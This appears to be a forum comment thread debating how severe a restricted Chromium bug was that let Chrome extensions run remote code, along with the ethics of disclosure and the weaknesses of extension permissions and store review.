I deleted the tweets and Gist just out of respect for the Chromium people's decision to restrict the issue.
I personally do not see the point of considering this specific issue particularly severe because the Chrome Web Store already allows extensions to execute remote code in extension context simply by declaring `unsafe-eval` or `unsafe-inline` (or specific remote hosts) -- and one can find such extensions quite easily.[1]
If the Chrome Web Store had a policy of "no remote code execution in extension context under any circumstance", then the issue would definitely have been high severity.
If this is as severe as I think it is, you may seriously want to consider taking down this link. Google and @gorhill have likely made things private for a reason.
Why? The model is wrong. There are always going to be severe bugs in deliberately complicated software. Hiding them behind terms that pretend the issue is about responsible disclosure is much more harmful in the long run because the real problem does not get fixed. Instead, due to a dependence on bad software, the problem can be used to attack speech.
Even without this issue all chrome extensions can execute code in their own context by explicitly setting a blob script-src rather than relying on the default, or by skipping the middle step and adding a domain they control to the script-src and directly linking a javascript file (why bother with blobs?), or even by pushing a new version which Chrome will automatically install for users. The title makes this issue sound severe but it's just a missing best practice.
I think "best practice" is a mistake in this context since it's an undocumented (?) change that has allowed malicious extensions to hide in plain sight - the default policy should not allow the naughty stuff they got up to, but it did because someone on the Chromium team weakened the security policy. Why audit for something that's impossible? (Obviously, thorough security screening WOULD audit for the impossible.)
This is worsened by the fact that the Play Store has near-zero security controls and no review so it's easy for malicious code to sneak into basically any high-install-count extension, especially if (as many extensions do) it requested lots of permissions it doesn't need.
Well, you can start by requiring the extensions to actually request all the permissions they use. Chrome does that now but has very coarse-grained permissions which makes it easier to hide malicious behavior, and in this case the permissions just weren't working so you could do something bad without the permission. The way extension permissions work in Chrome also means that extensions tend to request permissions they don't currently use, which means they can quietly pick up nasty behavior later on.
In the end an extension like Greasemonkey is implicitly unsafe because it's designed to run third-party content. You can't really fix that at an extension store/distribution platform level - so you put that dangerous footgun behind a permission and make sure users know what they're in for when installing it. I'm not sure what else you could really do since greasemonkey scripts rely on the ability to muck with page content.
I'm guessing this was quickly hidden by Google staff based on its severity? Unless this was released following responsible disclosure practices, in which case I don't know what I'm talking about.
Or it was that kind of bug report where the reporter made a normal thing sound dangerous. I remember one case when someone suggested that JS should be turned off by default because "arbitrary code execution" :)
Edit: with chrome extensions, I can inject a script tag from any domain to any page. I used that to inject a lib from CDN JS, but recognized it's silly and imported the package instead.